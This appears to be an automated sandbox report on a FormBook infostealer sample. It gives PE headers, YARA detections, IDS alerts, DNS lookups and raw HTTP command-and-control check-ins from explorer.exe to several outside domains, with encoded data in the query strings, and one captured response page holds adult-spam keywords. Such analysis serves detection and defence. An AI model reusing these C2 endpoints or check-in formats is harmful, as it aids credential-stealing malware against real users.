                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xc2bf00x4b.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc60000x5b0.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xc80000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xc2ba70x1c.text
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000xc0c440xc0e00False0.475148604585data6.39603433046IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .sdata0xc40000x1e80x200False0.861328125data6.60844431455IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                .rsrc0xc60000x5b00x600False0.425130208333data4.10455933281IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0xc80000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountry
                                                RT_VERSION0xc60a00x324data
                                                RT_MANIFEST0xc63c40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                DLLImport
                                                mscoree.dll_CorExeMain
                                                DescriptionData
                                                Translation0x0000 0x04b0
                                                LegalCopyrightCopyright 2016
                                                Assembly Version1.0.0.0
                                                InternalNameASCIIEncodi.exe
                                                FileVersion1.0.0.0
                                                CompanyName
                                                LegalTrademarks
                                                Comments
                                                ProductNameOthelloCS
                                                ProductVersion1.0.0.0
                                                FileDescriptionOthelloCS
                                                OriginalFilenameASCIIEncodi.exe
                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                01/28/22-14:03:13.623902TCP2031453ET TROJAN FormBook CnC Checkin (GET)4980580192.168.2.7162.241.24.116
                                                01/28/22-14:03:13.623902TCP2031449ET TROJAN FormBook CnC Checkin (GET)4980580192.168.2.7162.241.24.116
                                                01/28/22-14:03:13.623902TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980580192.168.2.7162.241.24.116
                                                01/28/22-14:03:32.833166TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982480192.168.2.7160.153.136.3
                                                01/28/22-14:03:32.833166TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982480192.168.2.7160.153.136.3
                                                01/28/22-14:03:32.833166TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982480192.168.2.7160.153.136.3
                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 28, 2022 14:03:13.486047983 CET4980580192.168.2.7162.241.24.116
                                                Jan 28, 2022 14:03:13.623425961 CET8049805162.241.24.116192.168.2.7
                                                Jan 28, 2022 14:03:13.623594999 CET4980580192.168.2.7162.241.24.116
                                                Jan 28, 2022 14:03:13.623902082 CET4980580192.168.2.7162.241.24.116
                                                Jan 28, 2022 14:03:13.763688087 CET8049805162.241.24.116192.168.2.7
                                                Jan 28, 2022 14:03:14.139157057 CET4980580192.168.2.7162.241.24.116
                                                Jan 28, 2022 14:03:14.316526890 CET8049805162.241.24.116192.168.2.7
                                                Jan 28, 2022 14:03:15.450484991 CET8049805162.241.24.116192.168.2.7
                                                Jan 28, 2022 14:03:15.450524092 CET8049805162.241.24.116192.168.2.7
                                                Jan 28, 2022 14:03:15.450611115 CET4980580192.168.2.7162.241.24.116
                                                Jan 28, 2022 14:03:15.450654030 CET4980580192.168.2.7162.241.24.116
                                                Jan 28, 2022 14:03:15.467937946 CET8049805162.241.24.116192.168.2.7
                                                Jan 28, 2022 14:03:15.468043089 CET4980580192.168.2.7162.241.24.116
                                                Jan 28, 2022 14:03:15.469754934 CET8049805162.241.24.116192.168.2.7
                                                Jan 28, 2022 14:03:15.469855070 CET4980580192.168.2.7162.241.24.116
                                                Jan 28, 2022 14:03:15.470474005 CET8049805162.241.24.116192.168.2.7
                                                Jan 28, 2022 14:03:15.470508099 CET8049805162.241.24.116192.168.2.7
                                                Jan 28, 2022 14:03:15.470573902 CET4980580192.168.2.7162.241.24.116
                                                Jan 28, 2022 14:03:15.470650911 CET4980580192.168.2.7162.241.24.116
                                                Jan 28, 2022 14:03:15.471146107 CET8049805162.241.24.116192.168.2.7
                                                Jan 28, 2022 14:03:15.471249104 CET4980580192.168.2.7162.241.24.116
                                                Jan 28, 2022 14:03:15.487816095 CET8049805162.241.24.116192.168.2.7
                                                Jan 28, 2022 14:03:15.487854004 CET8049805162.241.24.116192.168.2.7
                                                Jan 28, 2022 14:03:15.487884998 CET8049805162.241.24.116192.168.2.7
                                                Jan 28, 2022 14:03:15.487941980 CET4980580192.168.2.7162.241.24.116
                                                Jan 28, 2022 14:03:15.487993956 CET4980580192.168.2.7162.241.24.116
                                                Jan 28, 2022 14:03:15.488032103 CET4980580192.168.2.7162.241.24.116
                                                Jan 28, 2022 14:03:21.198528051 CET4982180192.168.2.7222.255.46.12
                                                Jan 28, 2022 14:03:21.423305988 CET8049821222.255.46.12192.168.2.7
                                                Jan 28, 2022 14:03:21.423458099 CET4982180192.168.2.7222.255.46.12
                                                Jan 28, 2022 14:03:21.434609890 CET4982180192.168.2.7222.255.46.12
                                                Jan 28, 2022 14:03:21.659496069 CET8049821222.255.46.12192.168.2.7
                                                Jan 28, 2022 14:03:21.936604977 CET4982180192.168.2.7222.255.46.12
                                                Jan 28, 2022 14:03:22.200671911 CET8049821222.255.46.12192.168.2.7
                                                Jan 28, 2022 14:03:22.344238997 CET8049821222.255.46.12192.168.2.7
                                                Jan 28, 2022 14:03:22.344396114 CET4982180192.168.2.7222.255.46.12
                                                Jan 28, 2022 14:03:22.344609022 CET8049821222.255.46.12192.168.2.7
                                                Jan 28, 2022 14:03:22.344681025 CET4982180192.168.2.7222.255.46.12
                                                Jan 28, 2022 14:03:27.366228104 CET4982280192.168.2.7154.214.67.82
                                                Jan 28, 2022 14:03:27.551924944 CET8049822154.214.67.82192.168.2.7
                                                Jan 28, 2022 14:03:27.552064896 CET4982280192.168.2.7154.214.67.82
                                                Jan 28, 2022 14:03:27.552238941 CET4982280192.168.2.7154.214.67.82
                                                Jan 28, 2022 14:03:27.739898920 CET8049822154.214.67.82192.168.2.7
                                                Jan 28, 2022 14:03:27.739952087 CET8049822154.214.67.82192.168.2.7
                                                Jan 28, 2022 14:03:27.739984035 CET8049822154.214.67.82192.168.2.7
                                                Jan 28, 2022 14:03:27.740133047 CET4982280192.168.2.7154.214.67.82
                                                Jan 28, 2022 14:03:27.740178108 CET4982280192.168.2.7154.214.67.82
                                                Jan 28, 2022 14:03:27.740267038 CET4982280192.168.2.7154.214.67.82
                                                Jan 28, 2022 14:03:27.924901009 CET8049822154.214.67.82192.168.2.7
                                                Jan 28, 2022 14:03:32.806322098 CET4982480192.168.2.7160.153.136.3
                                                Jan 28, 2022 14:03:32.832925081 CET8049824160.153.136.3192.168.2.7
                                                Jan 28, 2022 14:03:32.833043098 CET4982480192.168.2.7160.153.136.3
                                                Jan 28, 2022 14:03:32.833165884 CET4982480192.168.2.7160.153.136.3
                                                Jan 28, 2022 14:03:32.859730005 CET8049824160.153.136.3192.168.2.7
                                                Jan 28, 2022 14:03:32.862364054 CET8049824160.153.136.3192.168.2.7
                                                Jan 28, 2022 14:03:32.862401009 CET8049824160.153.136.3192.168.2.7
                                                Jan 28, 2022 14:03:32.862562895 CET4982480192.168.2.7160.153.136.3
                                                Jan 28, 2022 14:03:32.862596035 CET4982480192.168.2.7160.153.136.3
                                                Jan 28, 2022 14:03:32.889031887 CET8049824160.153.136.3192.168.2.7
                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 28, 2022 14:03:13.452752113 CET6374453192.168.2.78.8.8.8
                                                Jan 28, 2022 14:03:13.472398043 CET53637448.8.8.8192.168.2.7
                                                Jan 28, 2022 14:03:19.160311937 CET6145753192.168.2.78.8.8.8
                                                Jan 28, 2022 14:03:20.203752995 CET6145753192.168.2.78.8.8.8
                                                Jan 28, 2022 14:03:20.496268988 CET53614578.8.8.8192.168.2.7
                                                Jan 28, 2022 14:03:20.521825075 CET53614578.8.8.8192.168.2.7
                                                Jan 28, 2022 14:03:26.958014965 CET5836753192.168.2.78.8.8.8
                                                Jan 28, 2022 14:03:27.365228891 CET53583678.8.8.8192.168.2.7
                                                Jan 28, 2022 14:03:32.782090902 CET5957153192.168.2.78.8.8.8
                                                Jan 28, 2022 14:03:32.805377960 CET53595718.8.8.8192.168.2.7
                                                Jan 28, 2022 14:03:37.876553059 CET5268953192.168.2.78.8.8.8
                                                Jan 28, 2022 14:03:38.058901072 CET53526898.8.8.8192.168.2.7
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Jan 28, 2022 14:03:13.452752113 CET192.168.2.78.8.8.80xfd6fStandard query (0)www.desertbirdmercantile.comA (IP address)IN (0x0001)
                                                Jan 28, 2022 14:03:19.160311937 CET192.168.2.78.8.8.80xeac5Standard query (0)www.thietkenoithatvanphong.asiaA (IP address)IN (0x0001)
                                                Jan 28, 2022 14:03:20.203752995 CET192.168.2.78.8.8.80xeac5Standard query (0)www.thietkenoithatvanphong.asiaA (IP address)IN (0x0001)
                                                Jan 28, 2022 14:03:26.958014965 CET192.168.2.78.8.8.80xf897Standard query (0)www.yzztx.comA (IP address)IN (0x0001)
                                                Jan 28, 2022 14:03:32.782090902 CET192.168.2.78.8.8.80xa159Standard query (0)www.sigmamu.comA (IP address)IN (0x0001)
                                                Jan 28, 2022 14:03:37.876553059 CET192.168.2.78.8.8.80x87aStandard query (0)www.madeitinhome.comA (IP address)IN (0x0001)
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Jan 28, 2022 14:03:13.472398043 CET8.8.8.8192.168.2.70xfd6fNo error (0)www.desertbirdmercantile.comdesertbirdmercantile.comCNAME (Canonical name)IN (0x0001)
                                                Jan 28, 2022 14:03:13.472398043 CET8.8.8.8192.168.2.70xfd6fNo error (0)desertbirdmercantile.com162.241.24.116A (IP address)IN (0x0001)
                                                Jan 28, 2022 14:03:20.496268988 CET8.8.8.8192.168.2.70xeac5No error (0)www.thietkenoithatvanphong.asia222.255.46.12A (IP address)IN (0x0001)
                                                Jan 28, 2022 14:03:20.521825075 CET8.8.8.8192.168.2.70xeac5No error (0)www.thietkenoithatvanphong.asia222.255.46.12A (IP address)IN (0x0001)
                                                Jan 28, 2022 14:03:27.365228891 CET8.8.8.8192.168.2.70xf897No error (0)www.yzztx.com154.214.67.82A (IP address)IN (0x0001)
                                                Jan 28, 2022 14:03:32.805377960 CET8.8.8.8192.168.2.70xa159No error (0)www.sigmamu.comsigmamu.comCNAME (Canonical name)IN (0x0001)
                                                Jan 28, 2022 14:03:32.805377960 CET8.8.8.8192.168.2.70xa159No error (0)sigmamu.com160.153.136.3A (IP address)IN (0x0001)
                                                Jan 28, 2022 14:03:38.058901072 CET8.8.8.8192.168.2.70x87aNo error (0)www.madeitinhome.com23.230.105.134A (IP address)IN (0x0001)
                                                • www.desertbirdmercantile.com
                                                • www.thietkenoithatvanphong.asia
                                                • www.yzztx.com
                                                • www.sigmamu.com
                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.749805162.241.24.11680C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 28, 2022 14:03:13.623902082 CET10480OUTGET /b3xd/?qPYT=aV9tZ&iRah=Ie1PhgByqbmAnBTD/2NTTWN841CMZzf2VbgiXa4AsIuYcZI/bp6cv0uoISKMiipyVSmV9CFFiA== HTTP/1.1
                                                Host: www.desertbirdmercantile.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Jan 28, 2022 14:03:15.450484991 CET10500INHTTP/1.1 404 Not Found
                                                Date: Fri, 28 Jan 2022 13:03:13 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                Link: <https://www.desertbirdmercantile.com/wp-json/>; rel="https://api.w.org/"
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 65 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 61 76 61 64 61 2d 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 77 69 64 65 20 61 76 61 64 61 2d 68 74 6d 6c 2d 68 65 61 64 65 72 2d 70 6f 73 69 74 69 6f 6e 2d 74 6f 70 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 0a 09 0d 0a
                                                Data Ascii: e9<!DOCTYPE html><html class="avada-html-layout-wide avada-html-header-position-top" lang="en-US"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.749821222.255.46.1280C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 28, 2022 14:03:21.434609890 CET10521OUTGET /b3xd/?iRah=JdJx4d7W9+IGJje0hU/QcPoKaGdRUKvyvIN3jQdk7kxI7FpVQbo1IF0KYDc1cvBgS1iZcvDTaA==&qPYT=aV9tZ HTTP/1.1
                                                Host: www.thietkenoithatvanphong.asia
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Jan 28, 2022 14:03:22.344238997 CET10521INHTTP/1.1 301 Moved Permanently
                                                Date: Fri, 28 Jan 2022 13:00:04 GMT
                                                Server: Apache/2
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                X-Powered-By: PHP/7.2.22
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Location: https://www.thietkenoithatvanphong.asia/b3xd/?iRah=JdJx4d7W9+IGJje0hU/QcPoKaGdRUKvyvIN3jQdk7kxI7FpVQbo1IF0KYDc1cvBgS1iZcvDTaA==&qPYT=aV9tZ
                                                Vary: User-Agent
                                                Content-Length: 0
                                                Content-Type: text/html; charset=UTF-8


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.749822154.214.67.8280C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 28, 2022 14:03:27.552238941 CET10522OUTGET /b3xd/?qPYT=aV9tZ&iRah=u1+lAjLBA2+kcdvhq4UZu/nPbWuE94hnVKEDKIE9CxGJPgk2ISTbeIcckL5CyvhDdyZbFg7D5w== HTTP/1.1
                                                Host: www.yzztx.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Jan 28, 2022 14:03:27.739898920 CET10523INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Fri, 28 Jan 2022 13:03:27 GMT
                                                Content-Type: text/html
                                                Content-Length: 1755
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 c0 bc d6 dd d9 ca d0 d3 bb a5 c1 aa cd f8 c9 cc b3 c7 d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 35 34 30 32 3b 26 23 33 36 38 32 37 3b 26 23 32 36 33 37 39 3b 26 23 32 31 34 35 31 3b 26 23 32 30 31 35 34 3b 26 23 32 32 39 37 31 3b 26 23 33 30 33 34 30 3b 26 23 33 36 35 32 33 3b 26 23 32 30 33 30 37 3b 26 23 33 37 33 32 34 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 32 30 31 35 34 3b 26 23 32 35 31 30 34 3b 26 23 32 30 32 33 34 3b 26 23 32 30 31 35 34 3b 26 23 32 35 31 30 34 3b 26 23 33 32 35 30 38 3b 26 23 32 31 35 31 32 3b 26 23 33 32 35 39 33 3b 26 23 32 30 30 31 33 3b 26 23 32 35 39 39 31 3b 2c 26 23 31 39 39 36 38 3b 26 23 33 36 37 39 33 3b 26 23 32 35 37 32 30 3b 26 23 31 39 39 36 38 3b 26 23 33 36 37 39 33 3b 26 23 32 36 37 34 32 3b 26 23 31 39 39 36 38 3b 26 23 33 36 37 39 33 3b 26 23 33 33 30 37 33 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 2c 26 23 32 38 31 36 35 3b 26 23 33 32 34 33 31 3b 26 23 32 33 33 39 38 3b 26 23 32 39 39 38 33 3b 26 23 33 33 30 37 33 3b 26 23 33 35 30 33 33 3b 26 23 32 33 33 37 36 3b 26 23 33 33 32 35 38 3b 26 23 32 34 39 34 34 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 35 34 30 32 3b 26 23 33 36 38 32 37 3b 26 23 32 36 33 37 39 3b 26 23 32 31 34 35 31 3b 26 23 32 30 31 35 34 3b 26 23 32 32 39 37 31 3b 26 23 33 30 33 34 30 3b 26 23 33 36 35 32 33 3b 26 23 32 30 33 30 37 3b 26 23 33 37 33 32 34 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 32 30 31 35 34 3b 26 23 32 35 31 30 34 3b 26 23 32 30 32 33 34 3b 26 23 32 30 31 35 34 3b 26 23 32 35 31 30 34 3b 26 23 33 32 35 30 38 3b 26 23 32 31 35 31 32 3b 26 23 33 32 35 39 33 3b 26 23 32 30 30 31 33 3b 26 23 32 35 39 39 31 3b 2c 26 23 31 39 39 36 38 3b 26 23 33 36 37 39 33 3b 26 23 32 35 37 32 30 3b 26 23 31 39 39 36 38 3b 26 23 33 36 37 39 33 3b 26 23 32 36 37 34 32 3b 26 23 31 39 39 36 38 3b 26 23 33 36 37 39 33 3b 26 23 33 33 30 37 33 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 2c 26 23 32 38 31 36 35 3b 26 23 33 32 34 33 31 3b 26 23 32 33 33 39 38 3b 26 23 32 39 39 38 33 3b 26 23 33 33 30 37 33 3b 26 23 33 35 30 33 33 3b 26 23 32 33 33 37 36 3b 26 23 33 33 32 35 38 3b 26 23 32 34 39 34 34 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 35 34 30 32 3b 26 23 33 36 38 32 37 3b 26 23 32 36 33 37 39 3b 26 23 32 31 34 35 31 3b 26 23 32 30 31 35 34 3b 26 23 32 32 39 37 31 3b 26 23 33 30 33 34 30 3b 26 23 33 36 35 32 33 3b 26 23 32 30 33 30 37 3b 26 23 33 37 33 32 34 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 32 30 31 35 34 3b 26 23 32 35 31 30 34 3b 26 23 32 30 32 33 34 3b 26 23 32 30 31 35 34 3b 26 23 32 35 31 30 34 3b 26 23 33 32 35 30 38 3b 26 23 32 31 35 31 32 3b 26 23 33 32 35 39 33 3b 26 23 32 30 30 31 33 3b 26 23 32 35 39 39 31 3b 2c 26 23 31 39 39 36 38 3b 26 23 33 36 37 39 33 3b 26 23 32 35 37 32 30 3b 26 23 31 39 39 36 38 3b 26 23 33 36 37 39 33 3b 26 23 32 36 37 34 32 3b 26 23 31 39 39 36 38 3b 26 23 33 36 37 39 33 3b 26 23 33 33 30 37 33 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 2c 26 23 32 38 31 36 35 3b 26 23 33 32 34 33 31 3b 26 23 32 33 33 39 38 3b 26 23 32 39 39
                                                Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#25402;&#36827;&#26379;&#21451;&#20154;&#22971;&#30340;&#36523;&#20307;&#37324;,&#20122;&#27954;&#20154;&#25104;&#20234;&#20154;&#25104;&#32508;&#21512;&#32593;&#20013;&#25991;,&#19968;&#36793;&#25720;&#19968;&#36793;&#26742;&#19968;&#36793;&#33073;&#20813;&#36153;,&#28165;&#32431;&#23398;&#29983;&#33073;&#35033;&#23376;&#33258;&#24944;</title><meta name="keywords" content="&#25402;&#36827;&#26379;&#21451;&#20154;&#22971;&#30340;&#36523;&#20307;&#37324;,&#20122;&#27954;&#20154;&#25104;&#20234;&#20154;&#25104;&#32508;&#21512;&#32593;&#20013;&#25991;,&#19968;&#36793;&#25720;&#19968;&#36793;&#26742;&#19968;&#36793;&#33073;&#20813;&#36153;,&#28165;&#32431;&#23398;&#29983;&#33073;&#35033;&#23376;&#33258;&#24944;" /><meta name="description" content="&#25402;&#36827;&#26379;&#21451;&#20154;&#22971;&#30340;&#36523;&#20307;&#37324;,&#20122;&#27954;&#20154;&#25104;&#20234;&#20154;&#25104;&#32508;&#21512;&#32593;&#20013;&#25991;,&#19968;&#36793;&#25720;&#19968;&#36793;&#26742;&#19968;&#36793;&#33073;&#20813;&#36153;,&#28165;&#32431;&#23398;&#299


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.749824160.153.136.380C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 28, 2022 14:03:32.833165884 CET10531OUTGET /b3xd/?iRah=5GWj3iokSHma3YiDoT3m16TCcfPCT77oIBdOELLk89ETJqvKsRjgRlGfGSz2uWFXBl65BQRHGg==&qPYT=aV9tZ HTTP/1.1
                                                Host: www.sigmamu.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Jan 28, 2022 14:03:32.862364054 CET10532INHTTP/1.1 400 Bad Request
                                                Connection: close


                                                Click to jump to process

                                                Target ID:0
                                                Start time:14:01:29
                                                Start date:28/01/2022
                                                Path:C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe"
                                                Imagebase:0xf00000
                                                File size:793600 bytes
                                                MD5 hash:0E9943C0E2AFAF5E9ACEC16CE184B444
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.304067071.0000000004319000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.304067071.0000000004319000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.304067071.0000000004319000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.303068640.00000000033C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low

                                                Target ID:11
                                                Start time:14:01:56
                                                Start date:28/01/2022
                                                Path:C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe
                                                Imagebase:0xa20000
                                                File size:793600 bytes
                                                MD5 hash:0E9943C0E2AFAF5E9ACEC16CE184B444
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.299250808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.299250808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.299250808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.373779572.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.373779572.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.373779572.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.299753354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.299753354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.299753354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.372769249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.372769249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.372769249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.373929378.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
